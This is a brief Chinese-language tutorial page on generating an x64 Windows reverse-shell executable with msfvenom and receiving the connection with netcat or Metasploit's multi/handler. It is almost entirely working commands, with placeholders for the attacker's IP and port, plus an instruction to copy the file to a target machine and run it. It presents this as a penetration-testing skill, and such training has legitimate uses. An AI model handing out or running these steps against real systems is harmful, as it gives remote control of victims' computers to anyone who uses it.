📜  msfvenom x64 windows 反向 shell - Shell-Bash (1)

📅  最后修改于: 2023-12-03 14:44:25.377000             🧑  作者: Mango

msfvenom x64 Windows 反向 Shell - Shell-Bash

Msfvenom是Metasploit Framework的一部分,它是一个生成和编码恶意软件的工具。这里我们使用msfvenom进行端口转发并生成x64 Windows反向Shell。

生成Payload

首先,生成payload命令如下:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your ip address> LPORT=<your port> -f exe -o reverse_shell.exe
  • -p windows/x64/shell_reverse_tcp: 指定要生成的Payload类型
  • LHOST=<your ip address>: 指定你的IP地址
  • LPORT=<your port>: 指定端口
  • -f exe: 指定输出文件格式为exe文件
  • -o reverse_shell.exe: 指定输出文件的名称为reverse_shell.exe
使用反向Shell连接

接下来,我们启动监听器并将生成的reverse_shell.exe文件传输到目标机器上,然后运行该文件。

$ nc -vvnL <your port>

使用反向Shell连接目标机器。

$ msfconsole
msf> use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
msf exploit(multi/handler) > set LHOST <your ip address>
msf exploit(multi/handler) > set LPORT <your port>
msf exploit(multi/handler) > exploit

注意: 命令中的<your ip address><your port>需要根据实际情况替换为您的IP地址和端口号。

总结

使用msfvenom生成反向Shell是一个非常有用的技能,在渗透测试等工作中非常有用。使用正确的参数和选项生成反向Shell以便能够实现与目标系统的连接。该工具也提供了许多其他有用的选项和功能,可以帮助您选择最适合您需求的选项。